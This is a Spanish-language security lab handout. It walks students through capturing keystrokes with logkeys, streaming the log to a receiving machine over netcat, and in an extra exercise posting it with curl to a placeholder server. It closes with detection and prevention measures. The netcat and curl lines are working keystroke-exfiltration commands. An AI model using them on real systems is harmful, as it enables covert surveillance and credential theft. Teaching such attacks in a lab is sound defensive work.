Práctica 6. Ampliación¶
Envía Información de Keylogger a Otro Ordenador¶
Sigue estos pasos para enviar la información capturada por un keylogger a otro ordenador. Utiliza Netcat para transmitir los datos de forma sencilla por la red.
Parte 1: Configura el Keylogger para Enviar Información¶
Simula el uso de un keylogger para registrar las pulsaciones de teclas y envía esta información a un sistema remoto usando Netcat.
1. Instala y Configura el Keylogger¶
- Actualiza tu sistema:
sudo apt update && sudo apt upgrade -y - Instala logkeys:
sudo apt install logkeys - Inicia el keylogger para registrar las teclas presionadas:
El archivo de registro se guardará en
sudo logkeys --start/tmp/logkeys.log.
Parte 2: Envía las Pulsaciones de Teclas a Otro Ordenador¶
Configura el sistema receptor y el sistema atacante para transferir los datos capturados.
1. Configura el Ordenador Receptor¶
- Abre una terminal en el ordenador receptor y ejecuta:
Así escucharás en el puerto 4444 y guardarás los datos en received_keys.txt.
nc -lvp 4444 > received_keys.txt
2. Configura el Ordenador Atacante (Envía los Datos)¶
-
Redirige las pulsaciones registradas por logkeys hacia Netcat:
Sustituyesudo tail -f /tmp/logkeys.log | nc <IP_DEL_RECEPTOR> 4444<IP_DEL_RECEPTOR>por la IP del ordenador receptor.Explicación: -
tail -f /tmp/logkeys.log: Muestra el contenido del archivo de log en tiempo real. -| nc <IP_DEL_RECEPTOR> 4444: Envía los datos en tiempo real al puerto 4444 del receptor.
3. Simula el Robo de Datos¶
- Escribe texto en la terminal o en cualquier aplicación en el ordenador atacante. Las pulsaciones serán capturadas y enviadas al sistema receptor.
- En el receptor, visualiza las teclas presionadas:
Así verás todas las pulsaciones capturadas.
cat received_keys.txt
Parte 3: Aplica Medidas de Seguridad y Prevención¶
Comprende cómo protegerte frente a este tipo de ataque:
-
Detecta Keyloggers:
- Revisa los procesos en ejecución y busca actividad sospechosa.
- Usa herramientas como chkrootkit o rkhunter.
-
Prevén con Antivirus:
- Utiliza ClamAV para detectar malware, aunque no todos los keyloggers serán detectados.
-
Utiliza teclados en pantalla y autenticación multifactorial (MFA):
- Protege tus contraseñas usando teclados en pantalla o MFA.
-
Monitorea la red:
- Supervisa el tráfico para detectar comunicaciones sospechosas.
-
Cifra las comunicaciones:
- Usa conexiones seguras (SSH, VPN) en vez de protocolos no cifrados como Netcat o FTP.
Ejercicio Adicional: Simula la Exfiltración de Datos a un Servidor Remoto¶
Modifica el script del keylogger para enviar los datos por FTP o HTTP a un servidor remoto.
Por ejemplo, usa curl para enviar los datos a un servidor web:
sudo tail -f /tmp/logkeys.log | curl -X POST -d @- http://<IP_DEL_SERVIDOR>/logkeys
Reflexiona¶
Identifica los riesgos asociados con el uso de keyloggers y otros programas maliciosos. Aplica medidas de seguridad para protegerte contra estos ataques y comprende cómo prevenir y mitigar su impacto en un entorno real.